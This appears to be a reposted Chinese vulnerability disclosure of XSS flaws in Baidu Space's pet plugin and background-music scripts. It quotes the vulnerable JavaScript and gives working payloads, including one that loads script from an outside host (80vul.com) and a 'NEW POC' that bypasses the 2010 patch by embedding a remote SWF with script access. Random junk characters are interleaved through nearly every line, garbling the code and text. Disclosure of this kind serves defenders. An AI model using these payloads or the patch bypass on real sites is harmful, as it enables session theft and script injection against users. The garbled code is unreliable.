百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
0 v; C/ l1 m2 p4 o0 w
- E* z b$ d8 t+ ^1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
1 }3 v: q% h- Y& J- A9 R- p" W2.在http://hi.baidu.com/ui/scripts/pet/pet.js中 $ X7 `( x& u- o2 t( L
% @2 ?, O& G( ?5 d- ?: E
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
0 R& M5 l" z% `1 h- _% M其中BdUtil.insertWBR为
) t3 v9 ?" s5 Afunction(text, step) { " ^- y8 |7 y4 @
var textarea = textAreaCache || getContainer();
8 a- H9 \" o' j% r7 e5 W if (!textarea) {
$ q+ d, J0 \) W- E9 s) L1 ~ return text;
- R! X4 G/ y* n/ _8 E5 s } 8 E$ P2 d/ w0 r+ ~
textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");
4 @1 H. _: r) [, C1 R var string = textarea.value;
: `0 h4 }0 w8 n2 o/ [1 V var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi"); ! l4 o, ^% C3 I, j
var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
. F7 v- z/ a: x4 m& T return result; & J, t/ ~4 l* ^8 Z9 c9 j# X- q: A j9 |
}
2 Z1 r( j# h. J( e0 c在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS.
* x3 T+ B# e! J. Q- m8 t测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)> # v/ N1 w) u; w) ^: f2 F
4 N" y( h& M; F+ B! K' u+ f0 b
二:creatbgmusic() Dom-Xss Bug
8 y, f5 u! Y& h1 l$ M2 P百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞 7 ?: G m- d2 ^" Q) ^4 n' B
. H/ s9 ]2 y$ M& g( d+ D k在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: & ?5 E! w# E% K! {. q
$ ^+ {" o; n8 Y5 m" tfunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {
& t: J- r4 @; P3 H! S //传入的murl赋值到bgmusic1和bgmusic2中 2 C. |6 t) m! N$ z; V5 M
//可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 9 |5 `" V3 \. M3 z. X9 h3 ~
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
4 o/ C+ e# G/ ^) t! p if (musicnum <= 1) {
1 M: w# Z% h+ C2 F# ` ]6 ? bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";
* L0 T& d! z0 d- t, g9 F! x% r }
7 t2 ^' c: \, s6 L+ | bgmusic1 += "</OBJECT>";
" a, ?8 \; Y9 v* F& ?' g" Z var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\"";
4 o( c* `( a4 r8 R9 g if (musicnum <= 1) { & J& ?9 o2 p/ Y& m4 ~
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" "; 1 t) P( y0 c; Q& ^% M, p
} 0 S9 R* w( f W! @$ n
bgmusic2 += "> </EMBED>";
* i; P% B" v- D/ q+ t var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>"; , p/ T* O8 F: f7 y
var bgmus = detectWMP();
( O+ @0 p: y4 K) X0 Y if (functype == "FckMusicHelper") { 5 v. O% c" S% \
if (bgmus.installed) {
; O3 H6 C* v u" V/ Y; { if (bgmus.type == "IE") {
! y' L" [, z1 t( i3 ~* h6 y return bgmusic1; 1 ^* D) u# M) V, T- D5 W0 Q
} else if (bgmus.type == "NS") { & J S6 L4 ?1 p% g+ k4 D8 X
return bgmusic2; . D3 Q. H J6 Y( T5 y, @
} ) K3 w. q1 G1 Z) e6 S, r
} else {
; C: R7 I. S1 z$ ~& S" E2 d8 E% o return bgmusic3;
+ f1 Q* ?+ B8 _/ E* z0 x+ z }
0 G' ?, O! a& _( j } else { 8 w; U; H$ L. X5 s. A8 g# J6 e6 s- q
if (bgmus.installed) {
) L* [2 N2 J! ?- } //document.write 直接输出bgmusic变量 导致xss
# _3 _% f7 j* j* c- w+ X3 y, `& z# H if (bgmus.type == "IE") {
% a' p1 U. v3 C; ^$ s9 m8 D document.write(bgmusic1);
8 C! [: Q+ r& t/ a2 `( t } else if (bgmus.type == "NS") {
4 Y4 }. y) O4 ]! {6 p document.write(bgmusic2); % [; y2 |) J. v, }/ O, v5 V7 [1 O9 Z7 C
} & z& E- {5 f/ v0 `
} else { / k; I. u! i0 h3 _
document.write(bgmusic3);
! r8 T8 c% o8 |5 p4 A }
, O3 \/ w1 M/ h* c8 Z; D0 ` return ""; q) \2 D' a, U2 C7 F& |
}
" q3 Y/ ~/ _+ p}
& n4 g; j9 h. L" B/ Q0 k" ^, h& i4 g8 O. P F/ @" [0 |. R
在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下:
* t2 m; W& V$ m1 u) X
3 S& H1 f1 M3 bfunction initBlogTextForFCK(){
. T9 m; L. b S- T//fck init music ! {' t2 F3 ^1 \
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}} " c* I5 X) F: I3 o* K T
var imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组 ; F+ D, t: O& z0 q4 O' y1 r
var isAutoPlay=true; $ f& T7 e- r8 T5 v# t9 M, C
for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历.
+ D: A7 d; s% \+ W- \& P: j var img=imgBox;
2 t! k/ {! G7 Z* F if(img.getAttribute(’rel’)){
- ?3 R2 m/ Q3 k* @2 R var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
$ I- v, F- T2 @ var musicDiv = document.createElement("SPAN"); 9 W8 h( e" ~; k' O, Y7 D
var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
( ]' X' S' Y; ^! Z& t / v. V( |8 _' k0 f
.......................... 6 e, }( j* {% v! g2 g7 I( J4 A% `
' h/ o$ C8 F! m+ h //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
" P N# J9 A5 y: l* T7 c+ i+ F" r var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
@& P2 j6 x4 m( |) h5 l0 v* Y% v shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv); # w Q# P( c& c3 [3 R% O
musicDiv.innerHTML=shtml;
- `( ]* U% z1 Y& _ i--;n--;
& @! g+ j/ J6 y2 h/ e' Q }
3 }% R% \1 _3 F- ]0 r& n}
! i6 n6 S7 O$ M
Y0 T$ x- p3 c4 {* t/ z从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS. 5 ?# h0 L. W0 m" i6 z _
5 Y# W! M0 h4 J* |8 B
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>
1 S$ j* G3 G4 Q1 ^% K
$ v! g1 x* [* H; T& _2 {" @等待官方补丁 7 N: l8 ]: e2 ^6 q5 R: F! Q
, [/ _7 A- s. y1 O8 ~& @update 2010年5月13日 # W0 \1 M% ?$ s4 i
( _) U8 N& N0 g/ B* _官方补丁:
/ x, b% S$ e5 C0 j. c. q
6 Y4 t% D5 a( pvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
/ u2 b# k+ `" m" C" v3 G. W c" T1 p改为:
* }7 `7 w7 L$ X* rvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);
& D4 }* B5 W. U- q
- q1 E7 e" p4 |# fupdate 2010年5月13日 21:50:37
1 n: \- R a; V9 }* J1 `+ a
, F a" l7 G' X" F% k补丁存在漏洞 没有过滤" 可以继续跨: + j q/ m \1 N) I0 g" f
8 j O7 L8 s) n! ONEW POC:
, f2 `+ @. v5 u" ]- q0 L6 ?- |
4 f4 N" I: l0 U* H- j<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" : C: H) r2 M& I) i4 e+ K5 B* h
* m* E0 K) m }2 Z. n& G; |allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>1 X, x( J5 K& O
3 \7 h3 u" r5 ~5 [, S4 k5 N ]( a7 p |